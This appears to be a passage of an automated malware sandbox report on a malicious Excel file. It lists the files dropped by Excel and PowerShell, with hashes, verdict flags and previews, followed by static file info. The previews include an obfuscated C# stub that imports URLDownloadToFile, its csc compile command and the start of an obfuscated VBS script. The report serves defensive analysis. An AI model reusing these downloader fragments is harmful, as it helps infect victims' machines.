                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\pimcdet1.ihu.psm1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\rheitgef.bqq.ps1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\sgej4rnv.ehw.psm1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\sknmngfy\CSCD0FFB283197417ABFDFF0C5A9D2FBA3.TMP

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                              File Type:MSVC .res
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):652
                                                                                                                                                                              Entropy (8bit):3.085964946941068
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry84bak7YnqqH4UPN5Dlq5J:+RI+ycuZhNDbakSYUPNnqX
                                                                                                                                                                              MD5:F5B72AF8306DADEC0017166DF261A2CC
                                                                                                                                                                              SHA1:4058C05A937C8A8C84BD5ED17606081B7FCAA292
                                                                                                                                                                              SHA-256:F3688C78EB2D1AACC2F4E014B443DCEFD479FE9688CDCF6A2BDFFC7F0D80E79A
                                                                                                                                                                              SHA-512:16AFE29CC656297B475B67D27C88D91620B12440F8CD8110D31FE28CD86D20D75F5B62BE9F56B5E7DD141BAF55B99A560DD75CCA17B4AF3BC37D786E4CC0AE68
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.k.n.m.n.g.f.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.k.n.m.n.g.f.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.0.cs

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (352)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):475
                                                                                                                                                                              Entropy (8bit):3.8343091223020105
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:V/DsYLDS81zuTocE05NVMGpJ/RQXReKJ8SRHy4HnHy7mLmW8jvwy:V/DTLDfuToXSJ8XfHmc8jvwy
                                                                                                                                                                              MD5:CF949A7E29735AD6B8A09C0CC0BEAE97
                                                                                                                                                                              SHA1:DC92E9E10F38AEAB463C00E9D75C8DBF2079C789
                                                                                                                                                                              SHA-256:445F4CADD6D07292E03D69E62FAC1AB63AD9E3AC760E46D367BEA04A4604B7B4
                                                                                                                                                                              SHA-512:29C63C01AED8621DE822517BACFE90130EF54C77A73EDFC2036DF8A1CD182B1F6A4ACFA9742B81F7276A99CF01D98F012A5A8C06F87B4C1620F92D2CCEB36041
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace oMzzGcMyN.{. public class guMpbbeGdW. {. [DllImport("urlmoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr GmfRpUt,string PMdXvN,string Ft,uint axxsiASHf,IntPtr xHWSy);.. }..}.

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):369
                                                                                                                                                                              Entropy (8bit):5.224448777439502
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fsnIVLGzxs7+AEszIP23fsnIVLQA:p37Lvkmb6KzUIVLGWZEoUIVLQA
                                                                                                                                                                              MD5:192B74A46647476F7B28570F4D867AC2
                                                                                                                                                                              SHA1:1FADFA0C21C583955777ED62228F2FF8D9CC8704
                                                                                                                                                                              SHA-256:FF85CB8A89019EA57307867A5CBB84E6F046D7955201D68FFE319C6E7429D663
                                                                                                                                                                              SHA-512:7A970A9EB3A17C3E054073D645AF3F3B8EC7A2A5C690153C370417A41F3D557D4D88A33CF8A8A57A69409CC04ACCF34B528DA29DE24B653288E8B69A26788940
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.0.cs"

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.dll

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3072
                                                                                                                                                                              Entropy (8bit):2.8400977173622195
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:etGSkPBG5eAdF8c/kSyffjLvxtkZfIi7987JMEWI+ycuZhNDbakSYUPNnq:67sAdeoyTLv8J3798JMn1ulva3Dq
                                                                                                                                                                              MD5:F870D4E807B4060ADF0E9A3C8351DBAA
                                                                                                                                                                              SHA1:4974FCDB243A8C12FEFFD41387DDA251DD4710BC
                                                                                                                                                                              SHA-256:A6C17A9615E2B761932458D2FFA3D8AF6C0463CC243FC14EF7F285F9CC88FEFF
                                                                                                                                                                              SHA-512:8AC0232C15627DC1EA8F1C3C3405A81B2D25C93C65A8A7826854575CE6201FD815792F488383D449D4D5D96F5871C3078BA0AE1978C001D7218698B516396B1B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................<.5.....}.....}...........................".............. C.....P ......U.........[.....c.....j.....m.....w...U.....U...!.U.....U.......!.....*.......C.......................................,..........<Module>.sk

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.out

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):866
                                                                                                                                                                              Entropy (8bit):5.322432805355275
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:AId3ka6KzUIVLXEoUIVLQ1KaMD5DqBVKVrdFAMBJTH:Akka60UIVLXEoUIVLaKdDcVKdBJj
                                                                                                                                                                              MD5:32881DCE46F711F4D5E9ACD97B71A8E5
                                                                                                                                                                              SHA1:91DBA5406C8ACE04FCE6C471B481069330564F45
                                                                                                                                                                              SHA-256:B1750AFC9BBB6F97ED3933948C34A0D847B1E340252B619043D059578FCD23B1
                                                                                                                                                                              SHA-512:780EA417EF0B4CBB2CBC7F9212F6B5D6473CFEDFE9CCBC8644D96CF878B88EB7B0656431A57A4BB4626E375250B4B7CED4CCE61CD935E34CDD30A3A122DA6AF9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tgkhu3pa.dnc.ps1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\w0u2unns.4vq.psm1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Qn:Qn
                                                                                                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:..

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\zy5ppnwn.wi2.ps1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\~DF3D1775BC0D61434C.TMP

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\~DFC58CC94B888EDF2D.TMP

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\~DFD20930BBBA1449A8.TMP

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):195824
                                                                                                                                                                              Entropy (8bit):3.733217557919086
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:asQ4xYsrlTzTSTB3SJrS5GhHLgt5pxGwUAu6zUhYpt0nb2PRJ7oWdHIx:GUYsrlTyN3IS52lwt0nM5U
                                                                                                                                                                              MD5:5A71149A9C997CDCB94F1A84860417F7
                                                                                                                                                                              SHA1:9D80F853425AE99D844A70CEBAA59AEE73C537D1
                                                                                                                                                                              SHA-256:FF6B47D315645FDDC632876AE60A1A33A3E9138CEEF8A073D2FE8779208F7D8C
                                                                                                                                                                              SHA-512:448D914AA714C3DEAB84218BEDA6A3E94A9A5B8A5D912178F72A2EA82C73AD6DDB86A8E3443785FDCE8D9FD876C5DF7C26CD878DFA33F432E38AD62FF0E91C1B
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .a.l.m.e.c.e.g.u.e.i.r.a.(.f.l.u.c.t.u.a.d.o.r.,. .d.e.s.v.a.r.i.a.r.,. .m.i.l.i.c.i.a.n.o.,. .m.o.a.n.s.a.,. .h.e.m.i.a.t.r.o.p.h.i.a.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s..... . . . .d.i.m. .f.o.r.m.a.t.t.e.d.T.e.x.t..... . . . .d.i.m. .f.l.a.g.s..... . . . ..... . . . .f.l.a.g.s. .=. .0..... . . . . ..... . . . .i.f. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.F.I.L.T.E.R.). .t.h.e.n..... . . . . . . . .f.i.l.t.e.r. .=. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.F.I.L.T.E.R.)..... . . . . . . . .d.i.a.l.e.c.t. .=. .U.R.I._.W.Q.L._.D.I.A.L.E.C.T..... . . . .e.n.d. .i.f..... . . . ..... . . . .i.f. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.D.I.A.L.E.C.T.). .t.h.e.n..... . . . . . . . .d.i.a.l.e.c.t. .=. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.D.I.A.L.E.C.T.)..... . . . .e.n.d. .i.f..... . . . ..... . . . .I.f. .L.C.

                                                                                                                                                                              C:\Users\user\Desktop\037002451082_10142024.xls (copy)

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 14 10:06:00 2024, Security: 1
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):859136
                                                                                                                                                                              Entropy (8bit):7.024977112991656
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:6mzHJE+CzldlD3DERnLRmF8DMJhujh3LRG1XjPA81Q/QGMIBnAuyg:9czlfbARM8oyh39CJQCIBnB
                                                                                                                                                                              MD5:0A31EC61263C5314630727809D3D2477
                                                                                                                                                                              SHA1:FDA439EDED176E48019DCE272CB2C2586D3B212F
                                                                                                                                                                              SHA-256:062A7CF8CBF14B1BDB6F5D201C39F7F2CFF1BC975E0C80E6A1259DF6B2D69697
                                                                                                                                                                              SHA-512:1506A3957B20DF7BAFF420E7B1EDB8D10FF03A48EE46EF1E2D8B7CF2B64BDEFE31A986AFE70E3FF84F76789F8862F684DBAE08A3E5684B008875D786A9401E73
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:......................>...............................................................U...V...W.......0...............l.......n.......................................................................................................................................................................................................................................................................................................................................................................................................T......./........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                              C:\Users\user\Desktop\7D330000

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 14 10:06:00 2024, Security: 1
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):859136
                                                                                                                                                                              Entropy (8bit):7.024977112991656
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:6mzHJE+CzldlD3DERnLRmF8DMJhujh3LRG1XjPA81Q/QGMIBnAuyg:9czlfbARM8oyh39CJQCIBnB
                                                                                                                                                                              MD5:0A31EC61263C5314630727809D3D2477
                                                                                                                                                                              SHA1:FDA439EDED176E48019DCE272CB2C2586D3B212F
                                                                                                                                                                              SHA-256:062A7CF8CBF14B1BDB6F5D201C39F7F2CFF1BC975E0C80E6A1259DF6B2D69697
                                                                                                                                                                              SHA-512:1506A3957B20DF7BAFF420E7B1EDB8D10FF03A48EE46EF1E2D8B7CF2B64BDEFE31A986AFE70E3FF84F76789F8862F684DBAE08A3E5684B008875D786A9401E73
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:......................>...............................................................U...V...W.......0...............l.......n.......................................................................................................................................................................................................................................................................................................................................................................................................T......./........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                              C:\Users\user\Desktop\7D330000:Zone.Identifier

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                              Static File Info

                                                                                                                                                                              General

                                                                                                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 14 06:22:49 2024, Security: 1
                                                                                                                                                                              Entropy (8bit):6.9981022492095
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                                                              File name:037002451082_10142024.xls
                                                                                                                                                                              File size:868'352 bytes
                                                                                                                                                                              MD5:0a3e3fee911e89820e0f428e31f8e0ac
                                                                                                                                                                              SHA1:0000692437d8054df2c2ded80c4c35f6de07a6a0
                                                                                                                                                                              SHA256:8087bbe34f6bd622a82115c7653470d15ec77183b5cb82e1996fb170b1ace01f
                                                                                                                                                                              SHA512:25eb3013c07b7b5dc300ce5275e319e604b54d4a573985d913abcb5462f25bbe618824c4dede834005af077d7aab15df29d668806dbb30ed0dc82d6ac48f5bef
                                                                                                                                                                              SSDEEP:12288:fmzHJE+CzldhD3DERnLRmF8D5Jhuia3LjxN5nRXPZqe:WczlzbARM8dTa3JN3f/
                                                                                                                                                                              TLSH:97059DD3AA2D4F25CD850230A6F3476A1724DC83C626472B12F477687AFBAD43946F8D
                                                                                                                                                                              File Content Preview:........................>...............................................................U...V...W.......0...............m.......o..............................................................................................................................

                                                                                                                                                                              File Icon

                                                                                                                                                                              Icon Hash:276ea3a6a6b7bfbf

                                                                                                                                                                              Static OLE Info

                                                                                                                                                                              General

                                                                                                                                                                              Document Type:OLE
                                                                                                                                                                              Number of OLE Files:1

                                                                                                                                                                              OLE File "037002451082_10142024.xls"

                                                                                                                                                                              Indicators
                                                                                                                                                                              Has Summary Info:
